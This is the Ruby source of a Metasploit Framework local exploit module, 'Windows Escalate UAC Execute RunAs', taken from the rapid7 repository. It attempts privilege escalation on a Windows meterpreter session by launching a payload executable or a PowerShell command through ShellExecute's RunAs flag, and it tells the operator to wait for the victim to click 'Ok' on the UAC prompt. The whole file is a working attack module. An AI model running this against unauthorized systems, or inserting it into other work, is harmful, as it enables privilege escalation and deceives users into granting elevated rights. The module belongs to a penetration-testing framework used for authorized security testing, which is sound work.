GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/local/ask.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  # Priv supplies is_uac_enabled? and get_uac_level;
  # Runas supplies shell_execute_exe and shell_execute_psh.
  include Post::Windows::Priv
  include Post::Windows::Runas

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Windows Escalate UAC Execute RunAs',
      'Description' => %q(
        This module will attempt to elevate execution level using
        the ShellExecute undocumented RunAs flag to bypass low
        UAC settings.
      ),
      'License' => MSF_LICENSE,
      'Author' => [
        'mubix', # Original technique
        'b00stfr3ak' # Added powershell option
      ],
      'Platform' => ['win'],
      'SessionTypes' => ['meterpreter'],
      'Targets' => [['Windows', {}]],
      'DefaultTarget' => 0,
      'DisclosureDate' => '2012-01-03'
    ))

    register_options([
      OptString.new('FILENAME', [false, 'File name on disk']),
      OptString.new('PATH', [false, 'Location on disk, %TEMP% used if not set']),
      OptEnum.new('TECHNIQUE', [true, 'Technique to use', 'EXE', %w(PSH EXE)]),
    ])
  end

  def exploit
    # Report whether the user will see a UAC consent prompt.
    if is_uac_enabled?
      print_status 'UAC is Enabled, checking level...'
      case get_uac_level
      when UAC_NO_PROMPT
        print_good 'UAC is not enabled, no prompt for the user'
      else
        print_status "The user will be prompted, wait for them to click 'Ok'"
      end
    else
      print_good 'UAC is not enabled, no prompt for the user'
    end

    # Dispatch to the Runas mixin helper for the selected TECHNIQUE.
    case datastore['TECHNIQUE']
    when 'EXE'
      shell_execute_exe(datastore['FILENAME'], datastore['PATH'])
    when 'PSH'
      shell_execute_psh
    end
  end
end